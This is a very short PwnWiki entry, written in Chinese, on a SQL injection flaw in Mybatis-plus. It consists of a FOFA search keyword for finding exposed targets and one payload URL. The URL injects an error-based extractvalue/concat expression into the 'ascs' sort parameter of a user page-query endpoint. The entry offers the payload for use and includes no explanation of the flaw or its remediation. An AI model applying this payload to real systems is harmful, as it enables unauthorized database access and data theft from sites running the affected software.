Mybatis-plus SQL注入漏洞

From PwnWiki

FOFA

Mybatis


Payload

http://127.0.0.1:8081/user/selectPage?ascs=extractvalue(1,concat(char(126),md5(123)))&ascs=1